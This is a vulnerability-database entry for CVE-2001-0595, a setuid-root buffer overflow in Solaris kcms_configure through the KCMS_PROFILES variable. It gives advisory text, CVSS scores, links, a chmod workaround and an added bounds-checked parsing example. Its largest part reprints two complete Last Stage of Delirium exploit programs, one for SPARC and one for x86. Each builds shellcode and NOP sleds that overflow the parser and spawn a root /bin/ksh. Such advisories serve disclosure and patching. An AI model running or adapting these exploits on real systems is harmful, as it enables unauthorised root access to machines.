CVE-2001-0595
CVSS4.6
Published: 2001-08-02 00:00:00
Revised: 2008-09-05 16:24:29
NMCOE    

[Original] Buffer overflow in the kcsSUNWIOsolf.so library in Solaris 7 and 8 allows local attackers to execute arbitrary commands via the KCMS_PROFILES environment variable, e.g. as demonstrated using the kcms_configure program.


[CNNVD] Solaris kcms_configure Buffer Overflow Vulnerability (CNNVD-200108-018)

CVE(CAN) ID: CVE-2001-0595

The configuration tool "kcms_configure" shipped with Solaris is vulnerable to a buffer overflow through which an attacker can gain root privileges.

kcms_configure reads the environment variable KCMS_PROFILES, and the dynamic library kcsSUNWIOsolf.so provides the parsing of that variable. If the variable's value is overly long, a buffer overflow occurs when kcms_configure is run; because kcms_configure is setuid-to-root, a local attacker gains root privileges.

<* Source: LSD (contact@lsd-pl.net) *>
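As an added example (not code from the LSD advisory or from Sun's library), this is the defensive pattern the description implies: a length-checked parser for a KCMS_PROFILES-style value that rejects oversize input instead of copying it into a fixed buffer. The colon-separated entry format, the 256-byte per-entry limit and the sample paths are assumptions; the page gives none of them.

```c
#include <stdio.h>
#include <string.h>

/* Assumed bound per profile entry and number of entries; the real limits
 * inside kcsSUNWIOsolf.so are not on the page. */
#define PROFILE_MAX   256
#define PROFILE_SLOTS 8

/* Parse a colon-separated KCMS_PROFILES-style value into fixed-size slots.
 * Returns the number of entries stored, or -1 when the value is missing, an
 * entry is empty or would not fit, or there are more entries than slots.
 * The bounds check runs before any copy, so an overlong value never reaches
 * memcpy, which is the step the original library failed to guard. */
int kcms_parse_profiles(const char *value, char out[][PROFILE_MAX], size_t slots)
{
    size_t n = 0;
    if (value == NULL)
        return -1;
    for (;;) {
        const char *sep = strchr(value, ':');
        size_t len = sep ? (size_t)(sep - value) : strlen(value);
        if (len == 0 || len >= PROFILE_MAX || n >= slots)
            return -1;                  /* reject instead of overflowing */
        memcpy(out[n], value, len);
        out[n][len] = '\0';
        n++;
        if (sep == NULL)
            break;
        value = sep + 1;
    }
    return (int)n;
}

/* Convenience wrapper: parse into a local table and return only the count. */
int kcms_parse_count(const char *value)
{
    char table[PROFILE_SLOTS][PROFILE_MAX];
    return kcms_parse_profiles(value, table, PROFILE_SLOTS);
}

/* Constructed input: a value far longer than any slot, the same shape as the
 * overlong KCMS_PROFILES the advisory describes. Expected result: -1. */
int demo_oversize_rejected(void)
{
    char big[4096];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return kcms_parse_count(big);
}

int main(void)
{
    printf("normal value   -> %d entries\n", kcms_parse_count("/opt/profiles:/tmp/profiles"));
    printf("oversize value -> %d (rejected)\n", demo_oversize_rejected());
    return 0;
}
```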

- CVSS (Base Score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may cause system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:7.0

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0595
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0595
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200108-018
(Official data source) CNNVD

- Other Links and Resources

http://xforce.iss.net/static/6365.php
(VENDOR_ADVISORY)  XF  solaris-kcssunwiosolf-bo(6365)
http://www.securityfocus.com/bid/2605
(UNKNOWN)  BID  2605
http://archives.neohapsis.com/archives/bugtraq/2001-04/0203.html
(VENDOR_ADVISORY)  BUGTRAQ  20010411 [LSD] Solaris kcsSUNWIOsolf.so and dtsession vulnerabilities

- Vulnerability Information

Solaris kcms_configure Buffer Overflow Vulnerability
Medium severity  Boundary condition error
2001-08-02 00:00:00 2006-11-14 00:00:00
Local

- Advisories and Patches

Temporary workaround:

CNNVD recommends the following until Sun provides an official patch:

chmod a-s /usr/openwin/bin/kcms_configure

Vendor patch:

None yet

- Vulnerability Information (20767)

Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (1) (EDBID:20767)
solaris local
1999-12-01 Verified
0 Last Stage of Delirium
N/A
source: http://www.securityfocus.com/bid/2605/info

The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker.

The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root.

Exploits are available against Solaris x86 and Solaris Sparc.

/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
/*## kcsSUNWIOsolf.so                                                        #*/

#define NOPNUM 940
#define ADRNUM 32
#define PCHNUM 204

char setuidcode[]=
    "\x90\x08\x3f\xff"     /* and     %g0,-1,%o0           */
    "\x82\x10\x20\x17"     /* mov     0x17,%g1             */
    "\x91\xd0\x20\x08"     /* ta      8                    */
;

char shellcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>          */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>        */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0           */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1           */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]          */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16]         */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20]         */
    "\x82\x10\x20\x0b"     /* mov     0xb,%g1              */
    "\x91\xd0\x20\x08"     /* ta      8                    */
    "/bin/ksh"
;

char jump[]=
    "\x81\xc3\xe0\x08"     /* jmp     %o7+8                */
    "\x90\x10\x00\x0e"     /* mov     %sp,%o0              */
;

static char nop[]="\x80\x1c\x40\x11";

main(int argc,char **argv){
    char buffer[4096],adr[4],*b,pch[4],*envp[4],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
    printf("kcsSUNWIOsolf.so solaris 2.6 2.7 2.8 sparc\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()-256-112;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()-512-112;

    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=buffer;
    envp[1]=display;
    envp[2]=0;

    b=buffer;
    sprintf(b,"KCMS_PROFILES=");
    b+=14;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
}


- Vulnerability Information (20768)

Solaris 2.5/2.6/7.0/8 kcms_configure KCMS_PROFILES Buffer Overflow Vulnerability (2) (EDBID:20768)
solaris local
1999-12-01 Verified
0 Last Stage of Delirium
N/A
source: http://www.securityfocus.com/bid/2605/info

/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
/*## kcsSUNWIOsolf.so                                                        #*/

#define NOPNUM 16000
#define ADRNUM 2900

char setuidshellcode[]=
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x08"             /* jmp     <setuidshellcode+12>   */
    "\x5f"                 /* popl    %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x47\x01"         /* movb    %al,0x1(%edi)          */
    "\xeb\x0d"             /* jmp     <setuidshellcode+25>   */
    "\xe8\xf3\xff\xff\xff" /* call    <setuidshellcode+4>    */
    "\x9a\xff\xff\xff\xff"
    "\x07\xff"
    "\xc3"                 /* ret                            */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xe8\xee\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xeb\x16"             /* jmp     <setuidshellcode+59>   */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),edi         */
    "\x52"                 /* pushl   %edx                   */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x7(%edx)          */
    "\xb0\x3b"             /* movb    $0x3b,%al              */
    "\xe8\xd6\xff\xff\xff" /* call    <setuidshellcode+17>   */
    "\xe8\xe5\xff\xff\xff" /* call    <setuidshellcode+37>   */
    "/bin/ksh"
;

char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

main(int argc,char **argv){
    char buffer[20000],*b,adr[4],*envp[4],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
    printf("kcsSUNWIOsolf.so for solaris 2.7 2.8 (2.6 ?) x86\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned int*)adr)=((*(unsigned int(*)())jump)())+2300+8000;

    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=&buffer[0];
    envp[1]=&buffer[17000];
    envp[2]=display;
    envp[3]=0;

    b=buffer;
    sprintf(b,"xxx=");
    b+=4;
    for(i=0;i<NOPNUM;i++) *b++=0x90;
    for(i=0;i<strlen(setuidshellcode);i++) *b++=setuidshellcode[i];
    *b=0;

    b=&buffer[17000];
    sprintf(b,"KCMS_PROFILES=");
    b+=14;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
}


- Vulnerability Information

1791
Solaris kcsSUNWIOsolf.so Library KCMS_PROFILES Variable Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- Vulnerability Description

Unknown or Incomplete

- Timeline

2001-04-11 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete